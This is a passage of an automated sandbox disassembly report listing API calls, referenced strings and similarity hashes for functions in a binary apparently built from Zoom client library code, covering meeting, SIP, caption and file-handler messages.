                • Instruction Fuzzy Hash: 5C410435A007158BCB24EBA0DC4969D7771AF85309F444128EC12AB395DF349E8FEB69
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CC0A67
                • ?Now@Time@Cmm@@SA?AV12@XZ.RWSNDPQSKZ(?,00000060), ref: 00CC0A7D
                  • Part of subcall function 00CA1740: ?Now@TimeTicks@Cmm@@SA?AV12@XZ.RWSNDPQSKZ(?,?,?,?,?,?,00CAC2A6,?,?,?,?,?,?,?,?,?), ref: 00CA1761
                  • Part of subcall function 00CA1740: ?Now@TimeTicks@Cmm@@SA?AV12@XZ.RWSNDPQSKZ(?,?,?,?,?,?,00CAC2A6,?,?,?,?,?,?,?,?,?), ref: 00CA178E
                • ?ToTimeT@Time@Cmm@@QBE_JXZ.RWSNDPQSKZ(00000060), ref: 00CC0A85
                • ?Int64ToString@Cmm@@YAH_JAAV?$CStringT@D@1@@Z.RWSNDPQSKZ(00000000,?,00D334D8,?,?,?,?,?,?,?,?,?,?,?,00000060), ref: 00CC0AAA
                  • Part of subcall function 00C64000: ?Assign@?$CStringT@D@Cmm@@QAEXPBD@Z.RWSNDPQSKZ(?), ref: 00C6404C
                • ??0?$CStringT@D@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(99999999-,11112222), ref: 00CC0AC7
                  • Part of subcall function 00C562D0: __EH_prolog3.LIBCMT ref: 00C562D7
                • ?AssignOther@?$CStringT@_W@Cmm@@QAEAAV12@ABV?$CStringT@D@2@@Z.RWSNDPQSKZ(?,?,?,?,?,-000000000000,?,00000004,00D3E108,?,00000004,00D3E108,?,00000004), ref: 00CC0B61
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,-000000000000,?,00000004,00D3E108,?,00000004,00D3E108,?,00000004), ref: 00CC0B77
                • ?GetNakedGUID@CmmGUID@Cmm@@AAE?AV?$CStringT@_W@2@ABV32@@Z.RWSNDPQSKZ(?,?,?,?,00000060), ref: 00CC0BC3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$String$V12@$Now@Time$Assign@?$Ticks@Time@$??0?$AssignD@1@@D@2@@H_prolog3H_prolog3_Int64NakedOther@?$String@V32@@W@2@
                • String ID: -000000000000$11112222$99999999-
                • API String ID: 2818522883-2364856699
                • Opcode ID: 2ab918cfd0a88bd9623ded13ea5afee3dc9e26e7c1eab5e8ae51a83218c16d38
                • Instruction ID: af0837f711179d9daf2d948d2c9d0545216b6dbf5ffbb4e902d8f05e39505ac1
                • Opcode Fuzzy Hash: 2ab918cfd0a88bd9623ded13ea5afee3dc9e26e7c1eab5e8ae51a83218c16d38
                • Instruction Fuzzy Hash: 9F4148B5D00309DBCB14EFE4D996AEDB7B4AF18309F54041DE406B7282DB70AA89DB25
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8E16C
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6DD81), ref: 00C8E180
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.sip.receive.realtime.policies.notication), ref: 00C8E1B2
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ ref: 00C8E1EF
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.sip.receive.realtime.policies.notication), ref: 00C8E221
                • EnterCriticalSection.KERNEL32(?), ref: 00C8E283
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C8E2A0
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001), ref: 00C8E2B3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: Callid$Policies$com.zoom.app.assistant.sip.receive.realtime.policies.notication
                • API String ID: 1443623190-1536302961
                • Opcode ID: d74fd6e84a1029c7d0c4a20619a5a737cc0ab0e1e84af2b5d80c671c26c731d2
                • Instruction ID: 8df2d202284678e7e406b308bde6f9e9d99b678b2e66c9a8d3373abb4ccc7b72
                • Opcode Fuzzy Hash: d74fd6e84a1029c7d0c4a20619a5a737cc0ab0e1e84af2b5d80c671c26c731d2
                • Instruction Fuzzy Hash: 4741B075D00718DFCB14EFA4C849ADDBBB4AF44319F044128E812B7391DF709A8ADBA9
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C922A4
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C71891), ref: 00C922B8
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.sip.change.barge.em.call.status.notification), ref: 00C922EA
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ ref: 00C92327
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.sip.change.barge.em.call.status.notification), ref: 00C92359
                • EnterCriticalSection.KERNEL32(?), ref: 00C923BB
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C923D8
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001), ref: 00C923EB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: BeginTime$Status$com.zoom.app.assistant.sip.change.barge.em.call.status.notification
                • API String ID: 1443623190-3606876921
                • Opcode ID: 55dc03148ecd3002410ce14bae68a6c94590e27c7febc4a7f98edb1ead4b1eb1
                • Instruction ID: 7a8e96b4831e07228f868ec46feda95d9e169a19c4ae39ff5d1cb202189b2f97
                • Opcode Fuzzy Hash: 55dc03148ecd3002410ce14bae68a6c94590e27c7febc4a7f98edb1ead4b1eb1
                • Instruction Fuzzy Hash: 5A41C275D00708AFCF14EFA4D849AEDBBB4BF08315F044118E812A7391DF749A8AEB65
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6C657
                • ??0?$CmmMessageTemplate_7@IV?$CStringT@_W@Cmm@@V12@V12@III@Archive@Cmm@@QAE@PBDH0000000@Z.RWSNDPQSKZ(com.Zoom.app.conf.inter.process.audio.sharing.service.register.response,000027D6,result,mixedFMName,userFMName,shareFMName,smapleRate,samplesPerFrame,sampleDepth,00000004), ref: 00C6C68E
                  • Part of subcall function 00C7C020: __EH_prolog3.LIBCMT ref: 00C7C027
                  • Part of subcall function 00C7C020: ??0?$CmmMessageTemplate_6@IV?$CStringT@_W@Cmm@@V12@V12@II@Archive@Cmm@@QAE@PBDH000000@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,?,00000004,00C6C693,com.Zoom.app.conf.inter.process.audio.sharing.service.register.response,000027D6,result,mixedFMName,userFMName,shareFMName), ref: 00C7C049
                  • Part of subcall function 00C8C6F2: __EH_prolog3_GS.LIBCMT ref: 00C8C6F9
                  • Part of subcall function 00C8C6F2: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6C6DE), ref: 00C8C70D
                  • Part of subcall function 00C8C6F2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.inter.process.audio.sharing.service.register.response,00000044,00C6C6DE), ref: 00C8C73F
                  • Part of subcall function 00C8C6F2: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(00C6C6DE,-00000004,com.Zoom.app.conf.inter.process.audio.sharing.service.register.response,00000044,00C6C6DE), ref: 00C8C77C
                  • Part of subcall function 00C8C6F2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.inter.process.audio.sharing.service.register.response,00C6C6DE,-00000004,com.Zoom.app.conf.inter.process.audio.sharing.service.register.response,00000044,00C6C6DE), ref: 00C8C7AE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@StringV12@$Archive$H_prolog3MessagePackageTree@$H0000000@H000000@H_prolog3_Node@23@Root@Template_6@Template_7@Tree
                • String ID: com.Zoom.app.conf.inter.process.audio.sharing.service.register.response$maxChannel$mixedFMName$result$sampleDepth$samplesPerFrame$shareFMName$smapleRate$userFMName
                • API String ID: 477209010-1114125151
                • Opcode ID: b96595298fd02a1d02bcf88562e6a6d13a8c12450451cac71cef9da67d53260e
                • Instruction ID: cd672d94ed064ab21f69b96ce674b97ccf1cc60890bbbe11cbae41eb1c10ac18
                • Opcode Fuzzy Hash: b96595298fd02a1d02bcf88562e6a6d13a8c12450451cac71cef9da67d53260e
                • Instruction Fuzzy Hash: 3FF0F0B0A81350BFC720BF54E847B99B6A0AB14B19F08842CF2842A2C2CBF5854CD775
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72DC7
                • ??0?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@IV12@V12@II_J@Archive@Cmm@@QAE@PBDH0000000@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.captionchange.notify,00009E96,msgID,speakerID,displayName,text,source,language,timeStamp,00000004), ref: 00C72DFE
                  • Part of subcall function 00C7A1B0: __EH_prolog3.LIBCMT ref: 00C7A1B7
                  • Part of subcall function 00C7A1B0: ??0?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@IV12@V12@II@Archive@Cmm@@QAE@PBDH000000@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,?,00000004,00C72E03,com.zoom.app.cci.ccivideo.captionchange.notify,00009E96,msgID,speakerID,displayName,text), ref: 00C7A1D9
                  • Part of subcall function 00C930A2: __EH_prolog3_GS.LIBCMT ref: 00C930A9
                  • Part of subcall function 00C930A2: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C72E4E), ref: 00C930BD
                  • Part of subcall function 00C930A2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.cci.ccivideo.captionchange.notify,00000044,00C72E4E), ref: 00C930EF
                  • Part of subcall function 00C930A2: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(00C72E4E,-00000004,com.zoom.app.cci.ccivideo.captionchange.notify,00000044,00C72E4E), ref: 00C9312C
                  • Part of subcall function 00C930A2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.cci.ccivideo.captionchange.notify,00C72E4E,-00000004,com.zoom.app.cci.ccivideo.captionchange.notify,00000044,00C72E4E), ref: 00C9315E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@StringV12@$Archive$H_prolog3MessagePackageTree@$H0000000@H000000@H_prolog3_Node@23@Root@Template_6@Template_7@Tree
                • String ID: com.zoom.app.cci.ccivideo.captionchange.notify$displayName$language$msgID$source$speakerID$text$timeStamp$type
                • API String ID: 477209010-2462494478
                • Opcode ID: 389d4aa612d0cc77499a9fb33e69d9015e11a13d679046c4f67286bb85887bfd
                • Instruction ID: 328bb9a5f9e464f4be895076d13d79416267cced54d0985f83d03c2dfd3a01cc
                • Opcode Fuzzy Hash: 389d4aa612d0cc77499a9fb33e69d9015e11a13d679046c4f67286bb85887bfd
                • Instruction Fuzzy Hash: 2CF0AF75A90380FEC710ABA1EC06B5A76A0AB04F06F54C11CB2646A2D2CBF5454CDB31
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76BE7
                • ??0?$CmmMessageTemplate_8@IV?$CStringT@_W@Cmm@@V12@V12@V12@_JV12@V12@@Archive@Cmm@@QAE@PBDH00000000@Z.RWSNDPQSKZ(com.zoom.app.pt.notify.meeting.call.response,000027B1,MsgType,senderJID,senderName,sessionID,msgID,tmServerside,meetingID,DeclineMessage,00000004), ref: 00C76C23
                  • Part of subcall function 00C786D0: __EH_prolog3.LIBCMT ref: 00C786D7
                  • Part of subcall function 00C786D0: ??0?$CmmMessageTemplate_7@IV?$CStringT@_W@Cmm@@V12@V12@V12@_JV12@@Archive@Cmm@@QAE@PBDH0000000@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,00000004,00C76C28,com.zoom.app.pt.notify.meeting.call.response,000027B1,MsgType,senderJID,senderName), ref: 00C786FC
                  • Part of subcall function 00C95DF4: __EH_prolog3_GS.LIBCMT ref: 00C95DFB
                  • Part of subcall function 00C95DF4: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C76C4F), ref: 00C95E0F
                  • Part of subcall function 00C95DF4: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.pt.notify.meeting.call.response,00000044,00C76C4F), ref: 00C95E41
                  • Part of subcall function 00C95DF4: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(00C76C4F,-00000004,com.zoom.app.pt.notify.meeting.call.response,00000044,00C76C4F), ref: 00C95E7E
                  • Part of subcall function 00C95DF4: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.pt.notify.meeting.call.response,00C76C4F,-00000004,com.zoom.app.pt.notify.meeting.call.response,00000044,00C76C4F), ref: 00C95EB0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$V12@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@V12@@V12@_$H00000000@H0000000@H_prolog3_Node@23@Root@Template_7@Template_8@Tree
                • String ID: DeclineMessage$MsgType$com.zoom.app.pt.notify.meeting.call.response$meetingID$msgID$senderJID$senderName$sessionID$tmServerside
                • API String ID: 337227705-2092952728
                • Opcode ID: 28b65c77b3888be99645c4539461313e6002ba13c6490e96b405a81c7f2b0adf
                • Instruction ID: 0dbcf3a8acd326e1a5a243a0f363541324114259dec2872019f674b74d1469bd
                • Opcode Fuzzy Hash: 28b65c77b3888be99645c4539461313e6002ba13c6490e96b405a81c7f2b0adf
                • Instruction Fuzzy Hash: 8AF065F17C8B947ECB25BB669C0FB1A25A0AB00F15F808538B604792C1CBF5554CD679
                APIs
                  • Part of subcall function 00CADA21: __EH_prolog3.LIBCMT ref: 00CADA28
                  • Part of subcall function 00CADA21: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000008,00CAD7E1,?,0000002C,00CAC369,?,000000BC), ref: 00CADA4E
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,9FB8111D,?,00000000,?), ref: 00CD6944
                • std::_Lockit::_Lockit.LIBCPMT ref: 00CD6953
                • std::_Lockit::_Lockit.LIBCPMT ref: 00CD6975
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CD6996
                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00CD6A22
                • std::_Facet_Register.LIBCPMT ref: 00CD6A2F
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000), ref: 00CD6A3E
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CD6A51
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000), ref: 00CD6A60
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001), ref: 00CD6A7A
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,00000000,?,?,?,?), ref: 00CD6AAE
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000004,00000000,00000000,9FB8111D,?,00000000,?), ref: 00CD6B62
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@State@Unlock@$std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3LocinfoLocinfo::~_Register
                • String ID:
                • API String ID: 752974129-0
                • Opcode ID: ff539f0c264c1f236d0e0268e9c2a9bf0f819a37f0b85758ebf5dc10314d3a1d
                • Instruction ID: 8c456e6a30c3c7664d13e76b74484904716dff413192b12a9e15bf15956787ad
                • Opcode Fuzzy Hash: ff539f0c264c1f236d0e0268e9c2a9bf0f819a37f0b85758ebf5dc10314d3a1d
                • Instruction Fuzzy Hash: 2B819A75A00218DFCB14DF69C894BADBBF5FF48314F15805AE946AB3A1DB31AD05CB90
                APIs
                • IsInExceptionSpec.LIBVCRUNTIME ref: 00CE87F5
                • type_info::operator==.LIBVCRUNTIME ref: 00CE8817
                • ___TypeMatch.LIBVCRUNTIME ref: 00CE8926
                • CatchIt.LIBVCRUNTIME ref: 00CE8977
                • IsInExceptionSpec.LIBVCRUNTIME ref: 00CE89F8
                • _UnwindNestedFrames.LIBCMT ref: 00CE8A7C
                • CallUnexpected.LIBVCRUNTIME ref: 00CE8A97
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                • String ID: csm$csm$csm
                • API String ID: 4234981820-393685449
                • Opcode ID: 23aeb5ba16277604566974927106c9b36c17185cc30b72eab9b83406721110cf
                • Instruction ID: 7bd42ba7b480007f0e9c1ff2f922e2ff85fac75f421afe41814b31e629e8890d
                • Opcode Fuzzy Hash: 23aeb5ba16277604566974927106c9b36c17185cc30b72eab9b83406721110cf
                • Instruction Fuzzy Hash: 23B19F71C00289EFCF25DFA6C8819AEB7B5FF04310F14416AF8196B252DB31DA59EB91
                APIs
                  • Part of subcall function 00D0C8A1: CreateFileW.KERNEL32(00000000,00000000,?,00D0CC91,?,?,00000000,?,00D0CC91,00000000,0000000C), ref: 00D0C8BE
                • GetLastError.KERNEL32 ref: 00D0CCFC
                • __dosmaperr.LIBCMT ref: 00D0CD03
                • GetFileType.KERNEL32(00000000), ref: 00D0CD0F
                • GetLastError.KERNEL32 ref: 00D0CD19
                • __dosmaperr.LIBCMT ref: 00D0CD22
                • CloseHandle.KERNEL32(00000000), ref: 00D0CD42
                • CloseHandle.KERNEL32(00D03DE3), ref: 00D0CE8F
                • GetLastError.KERNEL32 ref: 00D0CEC1
                • __dosmaperr.LIBCMT ref: 00D0CEC8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                • String ID: H
                • API String ID: 4237864984-2852464175
                • Opcode ID: 3cef4b4f119d0e22b7ee4e154af7b0b657794d7309a16c1d86806999d90046b5
                • Instruction ID: 0607baa4a68d930d79540bed0bf376ab628b61e6b6f34b2ce52dbc5117029e6e
                • Opcode Fuzzy Hash: 3cef4b4f119d0e22b7ee4e154af7b0b657794d7309a16c1d86806999d90046b5
                • Instruction Fuzzy Hash: 46A12432A142489FDF199F68DC917AD3BA1AF06320F285259F805EB3E1CB34C902D775
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: H_prolog3
                • String ID: download_file$download_file_handler$list_file$list_file_handler$share_file$share_file_handler$undefined_file$upload_file$upload_file_handler
                • API String ID: 431132790-1571056328
                • Opcode ID: e95151882264faa8588d909ef89b28f177ff4584f8d7348ff0d951d923a241d4
                • Instruction ID: 2ed205d862ef22636d6f96a65443b966e3ba23243d2177df2e3d404848a6fb7d
                • Opcode Fuzzy Hash: e95151882264faa8588d909ef89b28f177ff4584f8d7348ff0d951d923a241d4
                • Instruction Fuzzy Hash: F1018674A44354EFCF50AE29B8026BA76F5BB24B21F204417B446A6680CBF0450CEBEB
                APIs
                • __EH_prolog3.LIBCMT ref: 00C743C7
                • ??0?$CmmMessageTemplate_6@HV?$CStringT@D@Cmm@@V12@V12@HV12@@Archive@Cmm@@QAE@PBDH000000@Z.RWSNDPQSKZ(com.zoom.app.assistant.voice.command.ui.update.request,00009D33,type,title,detail,displayCommands,duration,pronounciation,00000004), ref: 00C743F9
                  • Part of subcall function 00C79F30: __EH_prolog3.LIBCMT ref: 00C79F37
                  • Part of subcall function 00C79F30: ??0?$CmmMessageTemplate_5@HV?$CStringT@D@Cmm@@V12@V12@H@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,00000004,00C743FE,com.zoom.app.assistant.voice.command.ui.update.request,00009D33,type,title,detail,displayCommands,duration), ref: 00C79F56
                  • Part of subcall function 00C938C3: __EH_prolog3_GS.LIBCMT ref: 00C938CA
                  • Part of subcall function 00C938C3: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C74449), ref: 00C938DE
                  • Part of subcall function 00C938C3: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.voice.command.ui.update.request,00000044,00C74449), ref: 00C93910
                  • Part of subcall function 00C938C3: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(00000044,-00000004,com.zoom.app.assistant.voice.command.ui.update.request,00000044,00C74449), ref: 00C9394D
                  • Part of subcall function 00C938C3: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.voice.command.ui.update.request,00000044,-00000004,com.zoom.app.assistant.voice.command.ui.update.request,00000044,00C74449), ref: 00C9397F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@StringV12@$Archive$H_prolog3MessagePackageTree@$H000000@H00000@H_prolog3_Node@23@Root@Template_5@Template_6@TreeV12@@
                • String ID: com.zoom.app.assistant.voice.command.ui.update.request$detail$displayCommands$duration$indicateID$pronounciation$title$type
                • API String ID: 1869270054-1720361636
                • Opcode ID: 0646fd2f5e20d4a5b77ca541c760acc7d5ad52d8c252cefe2ee69e4f62b342b3
                • Instruction ID: c784202ba33de6849fae7c115ced5545b13332db7e23e504cf129b4ebccdad5b
                • Opcode Fuzzy Hash: 0646fd2f5e20d4a5b77ca541c760acc7d5ad52d8c252cefe2ee69e4f62b342b3
                • Instruction Fuzzy Hash: FCF096F1A84B40EFD720AFD5DC0AB9DB6E4AB00B15F404408F5545A6D1CBF4164CDB75
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74727
                • ??0?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@HHHHH@Archive@Cmm@@QAE@PBDH000000@Z.RWSNDPQSKZ(com.Zoom.app.conf.meeting.paap.toggle.event,000027C0,collectionUrl,toggle,disableLegacyEventTracker,accountToggle,disablePerfEventTracker,disablePerfMetricSPReport,00000004), ref: 00C74759
                  • Part of subcall function 00C79CA0: __EH_prolog3.LIBCMT ref: 00C79CA7
                  • Part of subcall function 00C79CA0: ??0?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@HHHH@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,00000004,00C7475E,com.Zoom.app.conf.meeting.paap.toggle.event,000027C0,collectionUrl,toggle,disableLegacyEventTracker,accountToggle,disablePerfEventTracker), ref: 00C79CC6
                  • Part of subcall function 00C93B33: __EH_prolog3_GS.LIBCMT ref: 00C93B3A
                  • Part of subcall function 00C93B33: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C747A9), ref: 00C93B4E
                  • Part of subcall function 00C93B33: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.meeting.paap.toggle.event,00000044,00C747A9), ref: 00C93B80
                  • Part of subcall function 00C93B33: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(00000044,-00000004,com.Zoom.app.conf.meeting.paap.toggle.event,00000044,00C747A9), ref: 00C93BBD
                  • Part of subcall function 00C93B33: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.meeting.paap.toggle.event,00000044,-00000004,com.Zoom.app.conf.meeting.paap.toggle.event,00000044,00C747A9), ref: 00C93BEF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$H000000@H00000@H_prolog3_Node@23@Root@Template_5@Template_6@Tree
                • String ID: accountToggle$collectionUrl$com.Zoom.app.conf.meeting.paap.toggle.event$disableLegacyEventTracker$disablePerfEventTracker$disablePerfMetricReport$disablePerfMetricSPReport$toggle
                • API String ID: 1018953180-3008889444
                • Opcode ID: 88c68873c910cac29a87b4e8014761c772658a4801a44ea59c74f2741dfe3791
                • Instruction ID: 07b657c741afae45967c30c23d65716c906b55331a549fa53bc68ebb345b6194
